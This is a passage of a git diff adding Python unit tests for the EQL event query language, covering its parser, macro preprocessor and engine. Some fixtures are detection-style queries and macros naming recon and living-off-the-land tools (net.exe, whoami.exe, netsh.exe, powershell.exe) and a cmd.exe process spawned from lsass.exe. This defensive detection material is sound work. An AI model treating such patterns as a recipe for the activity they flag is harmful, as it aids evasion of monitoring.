("a", "b", "c", "d") and not NAME in ("b", "d")') + subtracted = parse_expression('NAME in ("a", "c")') + self.assertEqual(and_not, subtracted, "set subtraction failed") + + def test_compound_merging_sets(self): + """Test that compound boolean terms are merged correctly.""" + mixed_sets = parse_expression('opcode=1 and name in ("a", "b", "c", "d") and name in ("b", "d")') + optimized = parse_expression('opcode=1 and name in ("b", "d")') + self.assertEqual(mixed_sets, optimized, "failed to merge at tail of AND") + + mixed_sets = parse_expression('opcode=1 and name in ("a", "b", "c", "d") and name in ("b", "d") and x=1') + optimized = parse_expression('opcode=1 and name in ("b", "d") and x=1') + self.assertEqual(mixed_sets, optimized, "failed to merge at middle of AND") + + mixed_sets = parse_expression('opcode=1 or name in ("a", "b", "c", "d") or name in ("e", "f")') + optimized = parse_expression('opcode=1 or name in ("a", "b", "c", "d", "e", "f")') + self.assertEqual(mixed_sets, optimized, "failed to merge at tail of OR") + + mixed_sets = parse_expression('opcode=1 or name in ("a", "b", "c", "d") or name in ("e", "f") or x=1') + optimized = parse_expression('opcode=1 or name in ("a", "b", "c", "d", "e", "f") or x=1') + self.assertEqual(mixed_sets, optimized, "failed to merge at middle of OR") + + def test_comparisons_to_sets(self): + """Test that multiple comparisons become sets.""" + multi_compare = parse_expression('pid == 4 or pid == 8 or pid == 520') + optimized = parse_expression("pid in (4, 8, 520)") + self.assertEqual(multi_compare, optimized, "Failed to merge comparisons into a set") + + def test_set_comparison_optimizations(self): + """Test that sets and comparisons are merged.""" + set_or_comp = parse_expression('name in ("a", "b") or name == "c"') + optimized = parse_expression('name in ("a", "b", "c")') + self.assertEqual(set_or_comp, optimized, "Failed to OR a set with matching comparison") + + set_and_comp = parse_expression('name in ("a", "b") and name == "c"') + optimized = parse_expression('false') + self.assertEqual(set_and_comp, optimized, "Failed to AND a set with matching missing comparison") + + set_and_comp = parse_expression('name in ("a", "b") and name == "b"') + optimized = parse_expression('name == "b"') + self.assertEqual(set_and_comp, optimized, "Failed to AND a set with matching comparison") + + # switch the order + comp_or_set = parse_expression('name == "c" or name in ("a", "b")') + optimized = parse_expression('name in ("c", "a", "b")') + self.assertEqual(comp_or_set, optimized, "Failed to OR a comparison with a matching set") + + comp_and_set = parse_expression('name == "c" and name in ("a", "b")') + optimized = parse_expression('false') + self.assertEqual(comp_and_set, optimized, "Failed to AND a comparison with a matching missing set") + + comp_and_set = parse_expression('name == "b" and name in ("a", "b")') + optimized = parse_expression('name == "b"') + self.assertEqual(comp_and_set, optimized, "Failed to AND a comparisong with a matching set") + + # test that values can be subtracted individually from sets + set_and_not = parse_expression('name in ("a", "b", "c") and name != "c"') + optimized = parse_expression('name in ("a", "b")') + self.assertEqual(set_and_not, optimized, "Failed to subtract specific value from set") + + def test_static_value_optimizations(self): + """Test parser optimizations for comparing static values.""" + expected_true = [ + '10 == 10', + '10 == 10.0', + '"abc" == "abc"', + 'true == true', + 'true != false', + '"" == ""', + '"" == "*"', + '"aaaaa" == "*"', + '"abc" == "*abc*"', + '"abc" == "*ABC*"', + '"ABC" == "*abc*"', + '"abc" != "d*"', + '"net view" == "net* view*"', + '"net view" == "net* view"', + '"net view view" == "net* view"', + '"net view " == "net* VIEW*"', + '"Net!!! VIEW view net view" == "net* view*"', + 'not "Net!!! VIEW view net view" != "net* view*"', + '"Newww!!! VIEW view net view" != "net* view*"', + '1 < 2', + '1 <= 2', + '2 <= 2', + '1 <= 1.0', + '1.0 <= 1', + '2 > 1', + '2 >= 1', + '2 >= 2', + '2 != 1', + '"ABC" <= "ABC"', + "length('abcdefg') == 7", + "100 in (1, 2, 3, 4, 100, 105)", + "'rundll' in (abc.def[100], 'RUNDLL')", + "not 'rundll' in ('100', 'nothing')", + ] + + expected_false = [ + '"b" == "a"', + '1 == 2', + '1 > 2', + '5 <= -3', + '"ABC" = "abcd"', + '"ABC*DEF" == " ABC DEF "', + '"abc" > "def"', + '"abc" != "abc"', + ] + + for expression in expected_true: + ast = parse_expression(expression) + self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) + self.assertTrue(ast.value, 'Parser did not evaluate {} as true'.format(expression)) + + for expression in expected_false: + ast = parse_expression(expression) + self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) + self.assertFalse(ast.value, 'Parser did not evaluate {} as false'.format(expression)) diff --git a/tests/test_parser.py b/tests/test_parser.py new file mode 100644 index 0000000..267eff9 --- /dev/null +++ b/tests/test_parser.py @@ -0,0 +1,364 @@ +"""Test case.""" +import datetime +import sys +import traceback +import unittest +from collections import OrderedDict # noqa: F403 + +from eql.ast import * # noqa: F403 +from eql.errors import EqlSyntaxError, EqlSemanticError, EqlParseError +from eql.parser import ( + parse_query, parse_expression, parse_definitions, ignore_missing_functions, parse_field, parse_literal +) +from eql.pipes import * # noqa: F403 + + +class TestParser(unittest.TestCase): + """Test EQL parsing.""" + + def test_valid_expressions(self): + """Test that expressions are parsed correctly.""" + valid = [ + "1 == 1", + "false != (1 == 1)", + 'abc != "ghi"', + "abc > 20", + "startsWith(abc, 'abc')", + "concat(a,b,c,d,)", + "a in (1,2,3,4,)", + "length(abc) < length(hij)", + "length(concat(abc))", + 'abc == substring("abc", 1, 3)', + "1", + '(1)', + "true", + "false", + "null", + "not null", + "abc", + '"string"', + 'abc and def', + '(1==abc) and def', + 'abc == (1 and 2)', + 'abc == (def and 2)', + 'abc == (def and def)', + 'abc == (def and ghi)', + '"\\b\\t\\r\\n\\f\\\\\\"\\\'"', + ] + + for query in valid: + parse_expression(query) + + def test_parse_field(self): + """Test that fields are parsed correctly.""" + self.assertEquals(parse_field("process_name "), Field("process_name")) + self.assertEquals(parse_field("TRUE "), Field("TRUE")) + self.assertEquals(parse_field(" data[0]"), Field("data", [0])) + self.assertEquals(parse_field("data[0].nested.name"), Field("data", [0, "nested", "name"])) + + self.assertRaises(EqlParseError, parse_field, " ") + self.assertRaises(EqlParseError, parse_field, "100.5") + self.assertRaises(EqlParseError, parse_field, "true") + self.assertRaises(EqlParseError, parse_field, "and") + self.assertRaises(EqlParseError, parse_field, "length(name) and path") + + def test_parse_literal(self): + """Test that fields are parsed correctly.""" + self.assertEquals(parse_literal("true"), Boolean(True)) + self.assertEquals(parse_literal("null"), Null()) + self.assertEquals(parse_literal(" 100.5 "), Number(100.5)) + self.assertEquals(parse_literal("true"), Boolean(True)) + self.assertEquals(parse_literal("'C:\\\\windows\\\\system32\\\\cmd.exe'"), + String("C:\\windows\\system32\\cmd.exe")) + + self.assertRaises(EqlParseError, parse_field, "and") + self.assertRaises(EqlParseError, parse_literal, "process_name") + self.assertRaises(EqlParseError, parse_literal, "length('abc')") + self.assertRaises(EqlParseError, parse_literal, "True") + + def test_functions(self): + """Test that functions are being parsed correctly.""" + # Make sure that functions are parsing all arguments + with ignore_missing_functions: + fn = parse_expression('somefunction( a and c, false, d or g) ') + self.assertIsInstance(fn, FunctionCall) + self.assertEqual(len(fn.arguments), 3) + + def test_invalid_expressions(self): + """Test that expressions are parsed correctly.""" + invalid = [ + '', # empty + 'a xor b', # made up comparator + 'a ^ b', # made up comparator + 'a % "b"', # made up comparator + 'a b c d', # missing syntax + 'def[]', # no index + 'def[ghi]', # index not a number + 'def[-1]', # negative indexes not supported + 'someFunc().abc', # invalid function + 'length().abc', # can't index these + '1.2.3', # invalid number + 'a.1', + '(field', # unclosed paren + '(field xx', # unclosed paren and bad syntax + 'field[', # unclosed bracket + 'field[0', # unclosed bracket + '(', + ')', + '()', # nothing inside + '', + '"invalid"string"', + 'descendant of [event_type where true', + '--100', + '1000 100', + '"" 100', + # literal values as fields and functions + 'true.100', + 'true()', + 'null.abc', + 'abc[0].null', + # require escape slashes, + '\\R', + '\\W', + # minimum of 1 argument + 'length()', + 'concat()', + ] + + keywords = [ + 'and', 'by', 'in', 'join', 'macro', 'not', 'of', 'or', 'sequence', 'until', 'where', 'with' + ] + + for query in invalid: + self.assertRaises(EqlParseError, parse_expression, query) + + for keyword in keywords: + self.assertRaises(EqlSyntaxError, parse_expression, keyword) + parse_expression(keyword.upper()) + + def test_valid_queries(self): + """Make sure that EQL queries are properly parsed.""" + valid = [ + 'file where true', + 'file where true and true', + 'file where false or true', + 'registry where not pid', + 'process where process_name == "net.exe" and command_line == "* user*.exe"', + 'process where command_line == "~!@#$%^&*();\'[]{}\\\\|<>?,./:\\"-= \' "', + 'process where \n\n\npid ==\t 4', + 'process where process_name in ("net.exe", "cmd.exe", "at.exe")', + 'process where command_line == "*.exe *admin*" or command_line == "* a b*"', + 'process where pid in (1,2,3,4,5,6,7,8) and abc == 100 and def == 200 and ghi == 300 and jkl == x', + 'process where ppid != pid', + 'image_load where not x != y', + 'image_load where not x == y', + 'image_load where not not not not x < y', + 'image_load where not x <= y', + 'image_load where not x >= y', + 'image_load where not x > y', + 'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8', + 'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ', + 'network where pid = 4', + 'process where descendant of [process where process_name == "lsass.exe"] and process_name == "cmd.exe"', + 'join \t\t\t[process where process_name == "*"] [ file where file_path == "*"\n]', + 'join by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', + 'sequence [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', + 'sequence by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', + 'join [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', + 'sequence [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', + 'sequence by pid [process where process_name == "*"] [file where file_path == "*"]', + 'sequence by pid with maxspan=200 [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence by pid with maxspan=2s [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence by pid with maxspan=2sec [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence by pid with maxspan=2seconds [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence with maxspan=2.5m [process where x == x] by pid [file where file_path == "*"] by ppid', + 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', + 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', + 'sequence by pid with maxspan=1.0075d [process where process_name == "*"] [file where file_path == "*"]', + 'dns where pid == 100 | head 100 | tail 50 | unique pid', + 'network where pid == 100 | unique command_line | count', + 'security where user_domain == "endgame" | count user_name a b | tail 5', + 'process where 1==1 | count user_name, unique_pid, concat(field2,a,bc)', + 'process where 1==1 | unique user_name, concat(field2,a,bc), field2', + 'registry where a.b', + 'registry where a[0]', + 'registry where a.b.c.d.e', + 'registry where a.b.c[0]', + 'registry where a[0].b', + 'registry where a[0][1].b', + 'registry where a[0].b[1]', + 'registry where topField.subField[100].subsubField == 0', + 'process where true | filter true', + 'process where 1==1 | filter abc == def', + 'process where 1==1 | filter abc == def and 1 != 2', + 'process where 1==1 | count process_name | filter percent > 0.5', + 'process where a > 100000000000000000000000000000000', + 'any where true | unique a b c | sort a b c | count', + 'any where true | unique a, b, c | sort a b c | count', + 'any where true | unique a, b, c | sort a,b,c | count', + 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', + 'file where child of [registry where true]', + 'file where event of [registry where true]', + 'file where event of [registry where true]', + 'file where descendant of [registry where true]', + # multiple by values + 'sequence by field1 [file where true] by f1 [process where true] by f1', + 'sequence by a,b,c,d [file where true] by f1,f2 [process where true] by f1,f2', + 'sequence [file where 1] by f1,f2 [process where 1] by f1,f2 until [process where 1] by f1,f2', + 'sequence by f [file where true] by a,b [process where true] by c,d until [process where 1] by e,f', + # sequence with named params + 'sequence by unique_pid [process where true] [file where true] fork', + 'sequence by unique_pid [process where true] [file where true] fork=true', + 'sequence by unique_pid [process where true] [file where true] fork=1', + 'sequence by unique_pid [process where true] [file where true] fork=false', + 'sequence by unique_pid [process where true] [file where true] fork=0 [network where true]', + 'sequence by unique_pid [process where true] [file where true] fork=0', + ] + + datetime.datetime.now() + + for i, text in enumerate(valid): + try: + query = parse_query(text) + rendered = query.render() + self.assertEqual(text.split()[0], rendered.split()[0]) + + # parse it again to make sure it's still valid and doesn't change + parse_again = parse_query(rendered) + rendered_again = parse_again.render() + + # repr + eval should also restore it properly + # Test that eval + repr works + actual_repr = repr(query) + eval_actual = eval(actual_repr) + + self.assertEqual(query, parse_again, "Query didn't reparse correctly.") + self.assertEqual(rendered, rendered_again) + self.assertEqual(query, eval_actual) + + except (EqlSyntaxError, EqlSemanticError): + ex_type, ex, tb = sys.exc_info() + traceback.print_exc(ex) + traceback.print_tb(tb) + self.fail("Unable to parse query #{}: {}".format(i, text)) + + def test_invalid_queries(self): + """Test that invalid queries throw the proper error.""" + invalid = [ + '', # empty + 'process where process_name == "abc.exe" garbage extraneous \"input\"', + 'garbage process where process_name < "abc.e"xe"', + 'process', + 'process where abc == "extra"quote"', + 'file where and', + 'file where file_name and', + 'file_name and', + 'file_name )', + 'file_name (\r\n\r\n', + 'file_name where (\r\n\r\n)', + 'process where _badSymbol == 100', + 'process where 1field == 2field', + 'sequence where 1field == 2field', + 'process where true | filter', + 'process where true | badPipe', + 'process where true | badPipe a b c', + 'process where true | head -100', + 'process where descendant of []', + 'file where nothing of [process where true]', + 'file where DescenDant of [process where true]', + 'garbage', + 'process where process_name == "abc.exe" | count 100', + 'process where process_name == "abc.exe" | unique 100', + 'process where process_name == "abc.exe" | sort 100', + 'process where process_name == "abc.exe" | head 100 abc', + 'process where process_name == "abc.exe" | head abc', + 'process where process_name == "abc.exe" | head abc()', + 'process where process_name == "abc.exe" | head abc(def, ghi)', + 'process where process_name == "abc.exe" | window abc', + 'process where process_name == "abc.exe" | window 10g', + 'sequence [process where pid == pid]', + 'sequence [process where pid == pid] []', + 'sequence with maxspan=false [process where true] [process where true]', + 'sequence with maxspan=10g [process where true] [process where true]', + 'sequence with badparam=100 [process where true] [process where true]', + # check that the same number of BYs are in every subquery + 'sequence [file where true] [process where true] by field1', + 'sequence [file where true] by field [file where true] by field1 until [file where true]', + 'sequence by a,b,c [file where true] by field [file where true] by field1 until [file where true]', + 'sequence [file where 1] by field [file where 1] by f1 until [file where 1] by f1,f2 | unique field', + 'sequence [process where 1] fork=true [network where 1]', + 'sequence [process where 1] [network where 1] badparam=true', + 'sequence [process where 1] [network where 1] fork=true fork=true', + 'sequence [process where 1] [network where 1] fork fork', + 'process where descendant of [file where true] bad=param', + '| filter true' + ] + for query in invalid: + self.assertRaises(EqlParseError, parse_query, query) + + def test_query_events(self): + """Test that event queries work with events[n].* syntax in pipes.""" + base_queries = ['abc', 'abc[123]', 'abc.def.ghi', 'abc.def[123].ghi[456]'] + for text in base_queries: + field_query = parse_expression(text) # type: Field + events_query = parse_expression('events[0].' + text) # type: Field + + index, query = field_query.query_multiple_events() + self.assertEqual(index, 0, "Didn't query from first event") + self.assertEqual(query, field_query, "Didn't unconvert query") + + index, query = events_query.query_multiple_events() + self.assertEqual(index, 0, "Didn't query from first event") + self.assertEqual(query, field_query, "Didn't unconvert query") + + for event_index, text in enumerate(base_queries): + events_text = 'events[{}].{}'.format(event_index, text) + field_query = parse_expression(text) # type: Field + events_query = parse_expression(events_text) # type: Field + index, query = events_query.query_multiple_events() + self.assertEqual(index, event_index, "Didn't query from {} event".format(event_index)) + self.assertEqual(query, field_query, "Didn't unconvert query") + + def test_comments(self): + """Test that comments are valid syntax but stripped from AST.""" + match = parse_query("process where pid=4 and ppid=0") + + query = parse_query("""process where pid = 4 /* multi\nline\ncomment */ and ppid=0""") + self.assertEqual(match, query) + + query = parse_query("""process where pid = 4 // something \n and ppid=0""") + self.assertEqual(match, query) + + query = parse_query("""process where pid + = 4 and ppid=0 + """) + self.assertEqual(match, query) + + query = parse_query("""process where + // test + // + //line + //comments + pid = 4 and ppid = 0 + """) + self.assertEqual(match, query) + + match = parse_expression("true") + query = parse_expression("true // something else \r\n /* test\r\n something \r\n*/") + self.assertEqual(match, query) + + commented = parse_definitions("macro test() pid = 4 and /* comment */ ppid = 0") + macro = parse_definitions("macro test() pid = 4 and ppid = 0") + self.assertEqual(commented, macro) + + def test_invalid_comments(self): + """Test that invalid/overlapping comments fail.""" + query_text = "process where /* something */ else */ true" + self.assertRaises(EqlParseError, parse_query, query_text) + + # Test nested comments (not supported) + query_text = "process where /* outer /* nested */ outer */ true" + self.assertRaises(EqlParseError, parse_query, query_text) + + query_text = "process where // true" + self.assertRaises(EqlParseError, parse_query, query_text) diff --git a/tests/test_preprocessor.py b/tests/test_preprocessor.py new file mode 100644 index 0000000..e87ac55 --- /dev/null +++ b/tests/test_preprocessor.py @@ -0,0 +1,229 @@ +"""Tests for the EQL preprocessor.""" +import os +import unittest +from collections import OrderedDict + +from eql.ast import * # noqa: F403 +from eql.parser import * # noqa: F403 +from eql.transpilers import TextEngine +from eql import EqlTypeMismatchError + + +class TestPreProcessor(unittest.TestCase): + """Tests for the EQL PreProcessor.""" + + macro_definitions = """ + macro A_OR_B(a,b) + a or b + + macro XOR(a,b) + A_OR_B(a and not b, b and not a) + + macro IN_GRAYLIST(proc) + proc in ( + "msbuild.exe", + "powershell.exe", + "cmd.exe", + "netsh.exe" + ) + + macro PROCESS_IN_GRAYLIST() + IN_GRAYLIST(process_name) + + macro PARENT_XOR_CHILD_IN_GRAYLIST() + XOR(IN_GRAYLIST(process_name), IN_GRAYLIST(parent_process_name)) + + macro DESCENDANT_OF_PROC(expr) + descendant of [process where opcode==1 and expr] + """ + + def test_parse_with_preprocessor(self): + """Test that preprocessor works with the parser.""" + preprocessor = get_preprocessor(""" + const ABC = 123 + const DEF = 456 + const GHI = 123 + + macro COMPARE_TWO(a, b) a == b + macro GET_TRUE(a) COMPARE_TWO(a, a) + macro IS_123(a) a == ABC + """) + + def p(text): + return parse_expression(text, preprocessor=preprocessor) + + self.assertEqual(p('ABC'), Number(123)) + self.assertEqual(p('COMPARE_TWO(some_field, "abc.exe")'), p('some_field == "abc.exe"')) + self.assertEqual(p('COMPARE_TWO(105, 105)'), Boolean(True)) + self.assertEqual(p('GET_TRUE(100)'), Boolean(True)) + self.assertEqual(p('IS_123(456)'), Boolean(False)) + self.assertEqual(p('IS_123(123)'), Boolean(True)) + + # now double up + double_pp = get_preprocessor(""" + macro TRUE() GET_TRUE(105) + macro FALSE() not TRUE() + """, preprocessor=preprocessor) + + def pp(text): + return parse_expression(text, preprocessor=double_pp) + + self.assertEqual(pp('ABC'), Number(123)) + self.assertEqual(pp('TRUE()'), Boolean(True)) + self.assertEqual(pp('FALSE()'), Boolean(False)) + self.assertEqual(pp('not FALSE()'), Boolean(True)) + + def test_preprocessor_type_hints(self): + """Test that type hints are correct for when parsing with a preprocessor.""" + preprocessor = get_preprocessor(""" + macro ENUM_COMMAND(name) + name in ("net.exe", "whoami.exe", "hostname.exe") + macro CONSTANT() 1 + """) + + with preprocessor: + parse_query("process where ENUM_COMMAND(process_name)") + parse_query("process where true | filter ENUM_COMMAND(process_name)") + parse_query("process where true | unique ENUM_COMMAND(process_name)") + parse_query("process where true | filter CONSTANT()") + + # unique requires a dynamic type, but there are no fields in CONSTANT + with self.assertRaisesRegexp(EqlTypeMismatchError, "Expected dynamic boolean/number/string"): + parse_query("process where true | unique CONSTANT()") + + def test_macro_expansion(self): + """Test EQL custom macros.""" + expanded = { + "A_OR_B": "a or b", + "XOR": "(a and not b) or (b and not a)", + "IN_GRAYLIST": 'proc in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', + "PROCESS_IN_GRAYLIST": 'process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', + "PARENT_XOR_CHILD_IN_GRAYLIST": ( + '( ' + ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' + ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' + ') or (' + ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' + ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' + ')' + ), + 'DESCENDANT_OF_PROC': 'descendant of [process where opcode == 1 and expr]' + } + + macros = parse_definitions(self.macro_definitions) + lookup = OrderedDict() + + with ignore_missing_functions: + for macro in macros: + lookup[macro.name] = macro + rendered = macro.render() + macro_copy = parse_definition(rendered) + self.assertEqual(macro, macro_copy) + self.assertEqual(rendered, macro_copy.render(), "Macro doesn't render valid EQL.") + + # Now load up each macro to the engine + engine = PreProcessor(macros) + + # Confirm that nested macros are expanded appropriately + for name, macro in engine.macros.items(): + expected_expr = parse_expression(expanded[name]) + self.assertEqual(macro.expression, expected_expr) + self.assertEqual(macro.expression.render(), expected_expr.render()) + + # Expand some EQL queries + queries = [ + ('process where DESCENDANT_OF_PROC(process_name="explorer.exe")', + 'process where descendant of [process where opcode=1 and process_name == "explorer.exe"]' + ), + ('process where XOR(a=="b", c=="d")', + 'process where ((a == "b") and not (c == "d")) or ((c == "d") and not (a == "b"))' + ), + ('file where true', + 'file where true', + ), + ('process where opcode=1 and PROCESS_IN_GRAYLIST()', + 'process where opcode==1 and process_name in ("msbuild.exe","powershell.exe","cmd.exe","netsh.exe")' + ), + ] + + for query, expanded_query in queries: + before_node = parse_query(query) + actual = engine.expand(before_node) + expected = parse_query(expanded_query) + + # Test that eval + repr works + actual_repr = repr(actual) + eval_actual = eval(actual_repr) + + self.assertEqual(actual, expected) + self.assertEqual(eval_actual, actual) + self.assertTrue(actual == expected) + self.assertFalse(actual != expected) + error_msg = "'{}' expanded to '{}' instead of '{}'".format(query, actual.render(), expected.render()) + self.assertEqual(actual.render(), expected.render(), error_msg) + + query = parse_expression("DESCENDANT_OF_PROC()") + self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) + + query = parse_expression("DESCENDANT_OF_PROC(1,2,3)") + self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) + + def test_custom_macro(self): + """Test python custom macro expansion.""" + def optimize_length(args): + arg, = args # only 1 allowed + if isinstance(arg, String): + return Number(len(arg.value)) + else: + return FunctionCall('length', [arg]) + + macro = CustomMacro('LENGTH', optimize_length) + engine = PreProcessor([macro]) + + with ignore_missing_functions: + example = parse_query('process where LENGTH("python.exe") == LENGTH(process_name)') + expected = parse_query('process where 10 == length(process_name)') + + output = engine.expand(example) + self.assertEqual(output, expected, "Custom macro LENGTH was not properly expanded") + + with ignore_missing_functions: + example = parse_query('process where LENGTH("abc", "def")') + + self.assertRaisesRegexp(ValueError, "too many values to unpack", engine.expand, example) + + def test_load_definitions_from_file(self): + """Test loading definitions from a file.""" + filename = 'example-definitions.eql.tmp' + config = {'definitions_files': [filename]} + with open(filename, 'w') as f: + f.write(self.macro_definitions) + engine = TextEngine(config) + os.remove(filename) + self.assertGreater(len(engine.preprocessor.macros), 0, "Definitions failed to load") + + def test_mixed_definitions(self): + """Test that macro and constant definitions can be loaded correctly.""" + defn = parse_definitions(""" + const magic = 100 + macro OR(a, b) a or b + """) + pp = PreProcessor(defn) + + # Confirm that copy and adding is working + pp2 = pp.copy() + pp.add_definition(parse_definition("macro ABC(a, b, c) error_error_error")) + pp2.add_definition(parse_definition("macro ABC(a, b, c) concat(a, magic, c)")) + + matches = [ + ("abc", "abc"), + ("OR(x, y)", "x or y"), + ("magic", "100"), + ("ABC(0,1,2)", "concat(0, 100, 2)"), + ] + + for before, after in matches: + with ignore_missing_functions: + before = parse_expression(before) + after = parse_expression(after) + self.assertEqual(pp2.expand(before), after) diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 626641e..c59ba53 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -3,12 +3,12 @@ import uuid from collections import defaultdict -from eql.engines.base import Event, AnalyticOutput, DEFAULT_TIME_UNIT -from eql.engines.build import get_reducer, get_engine, get_post_processor -from eql.engines.native import PythonEngine -from eql.parser import parse_query, parse_analytic +from eql import * # noqa: F403 +from eql.ast import * # noqa: F403 +from eql.parser import ignore_missing_functions +from eql.functions import Wildcard, Match from eql.schema import EVENT_TYPE_GENERIC -from .base import TestEngine +from eql.tests.base import TestEngine class TestPythonEngine(TestEngine): @@ -104,29 +104,32 @@ def test_engine_load(self): 'process where 1==1 | count process_name | filter percent > 0.5', 'process where a > 100000000000000000000000000000000', ] - for query in queries: - # Make sure every query can be converted without raising any exceptions - parsed_query = parse_query(query) - engine.add_query(parsed_query) - # Also try to load it as an analytic - parsed_analytic = parse_analytic({'metadata': {'id': uuid.uuid4()}, 'query': query}) - engine.add_analytic(parsed_analytic) + with ignore_missing_functions: + for query in queries: + # Make sure every query can be converted without raising any exceptions + parsed_query = parse_query(query) + engine.add_query(parsed_query) + + # Also try to load it as an analytic + parsed_analytic = parse_analytic({'metadata': {'id': uuid.uuid4()}, 'query': query}) + engine.add_analytic(parsed_analytic) def test_raises_errors(self): """Confirm that exceptions are raised when expected.""" queries = [ # ('process where bad_field.sub_field == 100', AttributeError), - ('process where length(0)', TypeError), + # ('process where length(0)', TypeError), # ('file where file_name.abc', AttributeError), # ('file where pid.something', AttributeError), ('registry where invalidFunction(pid, ppid)', KeyError), ] # Make sure that these all work as expected queries - for query, expected_error in queries: - parsed_query = parse_query(query) - self.assertRaises(expected_error, self.get_output, queries=[parsed_query]) + with ignore_missing_functions: + for query, expected_error in queries: + parsed_query = parse_query(query) + self.assertRaises(expected_error, self.get_output, queries=[parsed_query]) def test_query_output(self): """Confirm that the known queries and data return expected output.""" @@ -348,71 +351,6 @@ def test_special_pipes(self): sorted_results = list(sorted(results, key=lambda e: (e.data['count'], e.data['key']))) self.assertListEqual(sorted_results, results, "Count didn't output expected results") - def test_window_pipe(self): - def convert_time(seconds): - return int(float(seconds) * DEFAULT_TIME_UNIT) - - config = {'flatten': True} - events = [Event.from_data(d) for d in [ - { - "event_type": "process", - "process_name": "a", - "timestamp": convert_time(0) - }, - { - "event_type": "process", - "process_name": "b", - "timestamp": convert_time(1) - }, - { - "event_type": "process", - "process_name": "b", - "timestamp": convert_time(10.1) - }, - { - "event_type": "process", - "process_name": "c", - "timestamp": convert_time(11.1) - }, - { - "event_type": "process", - "process_name": "c", - "timestamp": convert_time(12) - }, - { - "event_type": "process", - "process_name": "d", - "timestamp": convert_time(13) - }, - { - "event_type": "process", - "process_name": "e", - "timestamp": convert_time(20.2) - }, - { - "event_type": "process", - "process_name": "a", - "timestamp": convert_time(31) - } - ]] - - ''' - 0: [a] - 1: [a,b] - 10.1: [b] - 11.1: [b,c] - 12: [b,c,c] - 13: [b,c,c,d] - 20.2: [c,c,d,e] - 31: [a] - ''' - - query = 'process where true | window 10s | unique hostname, process_name | unique_count hostname | filter count > 1' - results = self.get_output(queries=[parse_query(query)], config=config, events=events) - self.assertGreater(len(results), 1, "Window pipe returned no results") - self.assertListEqual([event.data['process_name'] for event in results], ['b', 'c', 'c', 'd', 'e'], "Window didn't output expected results.") - self.assertListEqual([event.data['count'] for event in results], [2, 2, 2, 3, 3], "Window didn't output expected results.") - @staticmethod def _custom_echo(x): return x @@ -424,15 +362,17 @@ def _custom_reverse(x): def test_custom_functions(self): """Custom functions in python.""" config = {'flatten': True} - query = "process where echo(process_name) == \"SvcHost.*\" and command_line == \"* -k *NetworkRes*d\"" - output = self.get_output(queries=[parse_query(query)], config=config) - event_ids = [event.data['serial_event_id'] for event in output] - self.validate_results(event_ids, [15, 16, 25], "Custom function 'echo' failed") - query = "process where length(user_domain)>0 and reverse(echo(user_domain)) = \"YTIROHTUA TN\" | tail 3" - output = self.get_output(queries=[parse_query(query)], config=config) - event_ids = [event.data['serial_event_id'] for event in output] - self.validate_results(event_ids, [43, 45, 52], "Custom function 'reverse'") + with ignore_missing_functions: + query = "process where echo(process_name) == 'SvcHost.*' and command_line == '* -k *NetworkRes*d'" + output = self.get_output(queries=[parse_query(query)], config=config) + event_ids = [event.data['serial_event_id'] for event in output] + self.validate_results(event_ids, [15, 16, 25], "Custom function 'echo' failed") + + query = "process where length(user_domain)>0 and reverse(echo(user_domain)) = \"YTIROHTUA TN\" | tail 3" + output = self.get_output(queries=[parse_query(query)], config=config) + event_ids = [event.data['serial_event_id'] for event in output] + self.validate_results(event_ids, [43, 45, 52], "Custom function 'reverse'") def test_analytic_output(self): """Confirm that analytics return the same results as queries.""" @@ -457,6 +397,40 @@ def add_analytic_output(output): # type: (AnalyticOutput) -> None actual_ids = output_ids[analytic.id] self.validate_results(actual_ids, expected_ids, query) + def test_engine_schema(self): + """Test loading the engine with a custom schema.""" + queries = [ + 'movie where name == "*Breakfast*" and IN_80s(release)', + 'person where name == "John Hughes"', + ] + + analytic_dicts = [{'query': q} for q in queries] + definitions = """ + macro IN_80s(date) date == "*/*/1980" + """ + + config = { + 'schema': { + 'events': { + 'movie': {'name': 'string', 'release': 'string'}, 'person': {} + } + }, + 'definitions': parse_definitions(definitions), + 'analytics': analytic_dicts + } + + pp = PreProcessor() + pp.add_definitions(config['definitions']) + + with Schema(**config['schema']): + expected = [parse_analytic(d, preprocessor=pp) for d in analytic_dicts] + + engine = BaseEngine(config) + with engine: + engine.add_analytics([parse_analytic(d) for d in analytic_dicts]) + + self.assertListEqual(engine.analytics, expected, "Analytics were not loaded and expanded properly.") + def test_relationship_pid_collision(self): """Confirm that the field used for tracking lineage can be dynamically set.""" config = {'flatten': True, 'pid_key': 'unique_pid', 'ppid_key': 'unique_ppid'} @@ -521,3 +495,67 @@ def test_relationship_pid_collision(self): output = self.get_output(queries=[parse_query(query)], config=config, events=events) event_ids = [event.data['unique_pid'] for event in output] self.validate_results(event_ids, ['host1-1003'], "Relationships failed due to pid collision") + + def test_mutli_line_functions(self): + """Test wildcard and match functions.""" + sources = [ + "this is a single line comment", + """This is + a multiline + comment""", + 